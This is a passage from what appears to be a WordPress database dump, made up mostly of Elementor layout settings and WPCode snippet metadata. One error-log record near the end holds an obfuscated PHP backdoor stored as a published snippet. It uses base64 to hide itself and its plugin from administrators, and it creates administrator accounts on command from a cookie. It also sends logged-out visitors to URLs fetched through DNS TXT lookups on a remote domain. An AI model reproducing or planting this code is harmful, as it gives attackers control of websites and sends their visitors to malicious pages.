r-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":651,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4615,4983,'_elementor_page_assets','a:0:{}'),(4616,4983,'_elementor_pro_version','3.8.1'),(4617,4983,'_elementor_css','a:6:{s:4:\"time\";i:1695734583;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4619,4984,'_wp_page_template','default'),(4620,4984,'_elementor_edit_mode','builder'),(4621,4984,'_elementor_template_type','wp-post'),(4622,4984,'_elementor_version','3.8.1'),(4623,4984,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4624,4984,'_elementor_page_assets','a:0:{}'),(4625,4984,'_elementor_pro_version','3.8.1'),(4626,4984,'_elementor_css','a:6:{s:4:\"time\";i:1695734763;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4627,169,'_elementor_css','a:6:{s:4:\"time\";i:1695734833;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4628,4638,'_elementor_css','a:6:{s:4:\"time\";i:1696222024;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4629,4641,'_elementor_css','a:6:{s:4:\"time\";i:1697873493;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4630,4640,'_elementor_css','a:6:{s:4:\"time\";i:1698158048;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4631,4639,'_elementor_css','a:6:{s:4:\"time\";i:1698743875;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4632,4637,'_elementor_css','a:6:{s:4:\"time\";i:1698788692;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4633,4644,'_elementor_css','a:6:{s:4:\"time\";i:1705209641;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4634,4652,'_elementor_css','a:6:{s:4:\"time\";i:1705419596;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4635,4653,'_elementor_css','a:6:{s:4:\"time\";i:1705431454;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4636,4985,'_wpcode_auto_insert','1'),(4637,4985,'_wpcode_auto_insert_number','1'),(4638,4985,'_wpcode_conditional_logic_enabled','1'),(4639,4985,'_wpcode_conditional_logic','a:2:{s:4:\"show\";s:4:\"hide\";s:6:\"groups\";a:1:{i:0;a:1:{i:0;a:4:{s:4:\"type\";s:4:\"user\";s:6:\"option\";s:9:\"logged_in\";s:8:\"relation\";s:1:\"=\";s:5:\"value\";s:4:\"true\";}}}}'),(4640,4985,'_wpcode_priority','10'),(4641,4985,'_wpcode_note',''),(4642,4986,'_wpcode_auto_insert','1'),(4643,4986,'_wpcode_auto_insert_number','1'),(4644,4986,'_wpcode_conditional_logic_enabled','1'),(4645,4986,'_wpcode_conditional_logic','a:2:{s:4:\"show\";s:4:\"hide\";s:6:\"groups\";a:1:{i:0;a:1:{i:0;a:4:{s:4:\"type\";s:4:\"user\";s:6:\"option\";s:9:\"logged_in\";s:8:\"relation\";s:1:\"=\";s:5:\"value\";s:4:\"true\";}}}}'),(4646,4986,'_wpcode_priority','10'),(4647,4986,'_wpcode_note',''),(4648,4985,'_wp_desired_post_slug','untitled-snippet'),(4649,4657,'_elementor_css','a:6:{s:4:\"time\";i:1710247620;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4650,4986,'_wp_desired_post_slug','untitled-snippet-2'),(4651,4987,'_wpcode_auto_insert','1'),(4652,4987,'_wpcode_auto_insert_number','1'),(4653,4987,'_wpcode_conditional_logic_enabled','1'),(4654,4987,'_wpcode_conditional_logic','a:2:{s:4:\"show\";s:4:\"hide\";s:6:\"groups\";a:1:{i:0;a:1:{i:0;a:4:{s:4:\"type\";s:4:\"user\";s:6:\"option\";s:9:\"logged_in\";s:8:\"relation\";s:1:\"=\";s:5:\"value\";s:4:\"true\";}}}}'),(4655,4987,'_wpcode_priority','10'),(4656,4987,'_wpcode_note',''),(4657,4987,'_wp_desired_post_slug','untitled-snippet'),(4658,4988,'_wpcode_auto_insert','1'),(4659,4988,'_wpcode_auto_insert_number','1'),(4660,4988,'_wpcode_conditional_logic_enabled','1'),(4661,4988,'_wpcode_conditional_logic','a:2:{s:4:\"show\";s:4:\"hide\";s:6:\"groups\";a:1:{i:0;a:1:{i:0;a:4:{s:4:\"type\";s:4:\"user\";s:6:\"option\";s:9:\"logged_in\";s:8:\"relation\";s:1:\"=\";s:5:\"value\";s:4:\"true\";}}}}'),(4662,4988,'_wpcode_priority','10'),(4663,4988,'_wpcode_note',''),(4664,4988,'_wp_desired_post_slug','untitled-snippet'),(4665,4989,'_wpcode_auto_insert','1'),(4666,4989,'_wpcode_auto_insert_number','1'),(4667,4989,'_wpcode_conditional_logic_enabled','1'),(4668,4989,'_wpcode_conditional_logic','a:2:{s:4:\"show\";s:4:\"hide\";s:6:\"groups\";a:1:{i:0;a:1:{i:0;a:4:{s:4:\"type\";s:4:\"user\";s:6:\"option\";s:9:\"logged_in\";s:8:\"relation\";s:1:\"=\";s:5:\"value\";s:4:\"true\";}}}}'),(4669,4989,'_wpcode_priority','10'),(4670,4989,'_wpcode_note',''),(4671,4989,'_wp_desired_post_slug','untitled-snippet'),(4672,4990,'_wpcode_auto_insert','1'),(4673,4990,'_wpcode_auto_insert_number','1'),(4674,4990,'_wpcode_conditional_logic_enabled','1'),(4675,4990,'_wpcode_conditional_logic','a:2:{s:4:\"show\";s:4:\"hide\";s:6:\"groups\";a:1:{i:0;a:1:{i:0;a:4:{s:4:\"type\";s:4:\"user\";s:6:\"option\";s:9:\"logged_in\";s:8:\"relation\";s:1:\"=\";s:5:\"value\";s:4:\"true\";}}}}'),(4676,4990,'_wpcode_priority','10'),(4677,4990,'_wpcode_note',''),(4678,4990,'_wp_desired_post_slug','untitled-snippet'),(4679,4991,'_wpcode_auto_insert','1'),(4680,4991,'_wpcode_auto_insert_number','1'),(4681,4991,'_wpcode_conditional_logic_enabled',''),(4682,4991,'_wpcode_conditional_logic','a:0:{}'),(4683,4991,'_wpcode_priority','10'),(4684,4991,'_wpcode_note',''),(4685,4991,'_wp_desired_post_slug','untitled-snippet'),(4686,4992,'_wpcode_auto_insert','1'),(4687,4992,'_wpcode_auto_insert_number','1'),(4688,4992,'_wpcode_conditional_logic_enabled',''),(4689,4992,'_wpcode_conditional_logic','a:0:{}'),(4690,4992,'_wpcode_priority','10'),(4691,4992,'_wpcode_note',''),(4692,4992,'_wp_desired_post_slug','untitled-snippet'),(4693,4993,'_wpcode_auto_insert','1'),(4694,4993,'_wpcode_auto_insert_number','1'),(4695,4993,'_wpcode_conditional_logic_enabled',''),(4696,4993,'_wpcode_conditional_logic','a:0:{}'),(4697,4993,'_wpcode_priority','10'),(4698,4993,'_wpcode_note',''),(4699,4993,'_wp_desired_post_slug','untitled-snippet'),(4700,4994,'_wpcode_auto_insert','1'),(4701,4994,'_wpcode_auto_insert_number','1'),(4702,4994,'_wpcode_conditional_logic_enabled',''),(4703,4994,'_wpcode_conditional_logic','a:0:{}'),(4704,4994,'_wpcode_priority','10'),(4705,4994,'_wpcode_note',''),(4706,4994,'_wpcode_location_extra',''),(4707,4994,'_wpcode_shortcode_attributes','a:0:{}'),(4708,4994,'_wpcode_last_error','a:10:{s:4:\"type\";i:2;s:7:\"message\";s:52:\"dns_get_record(): A temporary server error occurred.\";s:4:\"file\";s:169:\"/home/fmedia/domains/bauhaus.futuremediatrix.com/public_html/wp-content/plugins/insert-headers-and-footers/includes/class-wpcode-snippet-execute.php(287) : eval()\'d code\";s:4:\"line\";i:1;s:8:\"wpc_type\";s:5:\"error\";s:16:\"doing_activation\";b:0;s:7:\"snippet\";O:14:\"WPCode_Snippet\":32:{s:9:\"post_type\";s:6:\"wpcode\";s:17:\"location_taxonomy\";s:15:\"wpcode_location\";s:18:\"code_type_taxonomy\";s:11:\"wpcode_type\";s:13:\"tags_taxonomy\";s:11:\"wpcode_tags\";s:2:\"id\";i:4994;s:9:\"post_data\";O:7:\"WP_Post\":24:{s:2:\"ID\";i:4994;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2024-03-18 13:55:40\";s:13:\"post_date_gmt\";s:19:\"2024-03-18 13:55:40\";s:12:\"post_content\";s:4216:\"$d0=base64_decode(\'YjQxNDZkZjgxN2U2NDFiOTE4ZDM3MWVkODY4NTgwNzM=\');if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&&!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9\');echo base64_decode(\'I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($i1){unset($i1[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $i1;});}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _gcookie($z2){return(isset($_COOKIE[$z2]))?base64_decode($_COOKIE[$z2]):\'\';}if(!empty($d0)&&_gcookie(base64_decode(\'cHc=\'))===$d0){switch(_gcookie(base64_decode(\'Yw==\'))){case base64_decode(\'c2Q=\'):$e3=_gcookie(base64_decode(\'ZA==\'));if(strpos($e3,base64_decode(\'Lg==\'))>0){update_option(base64_decode(\'ZA==\'),$e3);}break;case base64_decode(\'YXU=\'):$e4=_gcookie(base64_decode(\'dQ==\'));$l5=_gcookie(base64_decode(\'cA==\'));$p6=_gcookie(base64_decode(\'ZQ==\'));if($e4&&$l5&&$p6&&!username_exists($e4)){$w7=wp_create_user($e4,$l5,$p6);$x8=new WP_User($w7);$x8->set_role(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'));}break;}return;}function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $m9){if(array_key_exists($m9,$_SERVER)&&!empty($_SERVER[$m9])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$m9])as $v10){$v10=trim($v10);if(filter_var($v10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $v10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$v10=_user_ip();if(!$v10){return;}$h11=get_transient(base64_decode(\'ZXhw\'));if(!is_array($h11)){$h11=array();}foreach($h11 as $q12=>$e13){if(time()-$e13>86400){unset($h11[$q12]);}}if(key_exists($v10,$h11)&&(time()-$h11[$v10]<86400)){return;}$m14=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$u15=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$v10);$u15=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$u15);$v16=base64_decode(\'Y2xvdWQtc3RhdHMuY29t\');$h17=get_option(base64_decode(\'ZA==\'));if($h17&&strpos($h17,base64_decode(\'Lg==\'))>0){$v16=$h17;}$g18=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$q19=(!$m14?base64_decode(\'dW5rLmNvbQ==\'):$m14).base64_decode(\'Lg==\').(!$u15?base64_decode(\'MC0wLTAtMA==\'):$u15).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$g18:base64_decode(\'bmQ=\')).base64_decode(\'Lg==\').$v16;$p20=@dns_get_record($q19,DNS_TXT);if(is_array($p20)&&!empty($p20)){if(isset($p20[0][base64_decode(\'dHh0\')])){$p20=$p20[0][base64_decode(\'dHh0\')];$p20=base64_decode($p20);if($p20==base64_decode(\'ZXJy\')){$h11[$v10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$h11);}else if(substr($p20,0,4)===base64_decode(\'aHR0cA==\')){$h11[$v10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$h11);wp_redirect($p20);exit;}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}\";s:10:\"post_title\";s:16:\"Untitled Snippet\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:16:\"untitled-snippet\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2024-03-18 13:55:40\";s:17:\"post_modified_gmt\";s:19:\"2024-03-18 